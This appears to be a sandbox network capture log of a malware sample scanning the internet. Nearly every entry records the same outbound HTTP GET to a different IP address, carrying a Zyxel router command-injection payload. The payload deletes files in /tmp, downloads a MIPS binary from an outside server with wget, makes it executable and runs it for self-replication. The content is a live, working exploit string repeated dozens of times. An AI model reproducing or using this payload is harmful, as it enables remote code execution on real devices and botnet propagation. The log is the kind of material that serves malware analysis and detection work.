                                                Jan 28, 2024 10:16:17.693914890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2421192.168.2.2333638202.150.218.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693922997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2422192.168.2.2339488170.17.31.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693936110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2423192.168.2.2350896158.79.248.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693988085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2424192.168.2.2333452132.167.49.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694029093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2425192.168.2.2332892219.96.218.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694056034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2426192.168.2.233962265.141.186.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694087029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2427192.168.2.2336714162.81.202.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694093943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2428192.168.2.2340348124.175.11.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694154978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2429192.168.2.2354920209.240.144.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694165945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2430192.168.2.234774612.8.138.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694195032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2431192.168.2.2349718124.11.225.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694228888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2432192.168.2.235188295.241.141.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694272995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2433192.168.2.235065024.25.26.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694283962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2434192.168.2.235445887.31.54.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694334984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2435192.168.2.2358202196.206.95.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694353104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2436192.168.2.2359762106.79.21.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694360018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2437192.168.2.233358289.78.127.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694386959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2438192.168.2.2358020128.229.84.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694432974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2439192.168.2.2341098213.60.11.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694446087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2440192.168.2.235989454.23.164.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694469929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2441192.168.2.233490620.148.192.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694506884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2442192.168.2.235805227.40.28.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694538116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2443192.168.2.2349072180.103.40.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694559097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2444192.168.2.23415544.94.27.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694583893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2445192.168.2.2339888189.179.143.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694597006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2446192.168.2.2334536159.201.151.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694628954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2447192.168.2.2337294190.217.136.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694641113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2448192.168.2.233985077.242.46.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694673061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2449192.168.2.2338210188.24.112.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694674015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2450192.168.2.2342462104.62.250.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694724083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2451192.168.2.2358990112.53.6.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694745064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2452192.168.2.2339746204.36.85.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694749117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2453192.168.2.2333128183.71.155.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694753885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2454192.168.2.2359452129.88.154.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694762945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2455192.168.2.235656213.142.19.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694809914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2456192.168.2.2334014159.48.112.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694866896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2457192.168.2.2355726140.7.10.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694892883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2458192.168.2.2342414181.199.159.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.694905996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2459192.168.2.234478213.116.167.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695089102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2460192.168.2.234441093.9.67.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695118904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2461192.168.2.2352852164.3.75.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695136070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2462192.168.2.2344012116.204.216.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695148945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2463192.168.2.235940498.37.235.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695173979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2464192.168.2.234115836.32.10.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695200920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2465192.168.2.2349266164.125.166.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695219040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2466192.168.2.234610682.57.249.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695245028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2467192.168.2.2351036133.36.31.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695272923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2468192.168.2.2360646118.172.197.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695302963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2469192.168.2.2346736159.28.136.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695314884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2470192.168.2.235078472.254.138.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695386887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2471192.168.2.234878251.28.245.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695400953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2472192.168.2.2342984217.219.165.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695405006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2473192.168.2.233385463.99.213.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695437908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2474192.168.2.233514084.63.171.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695461035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2475192.168.2.2353944171.25.219.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695488930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2476192.168.2.2343076116.128.174.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695518970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2477192.168.2.2346800220.254.98.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695538998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2478192.168.2.235020239.73.53.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695559978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2479192.168.2.23479321.29.125.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695614100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2480192.168.2.234292612.252.213.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695626020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2481192.168.2.2349126220.245.37.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695656061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2482192.168.2.2335838182.137.28.40443
                                                TimestampBytes transferredDirectionData
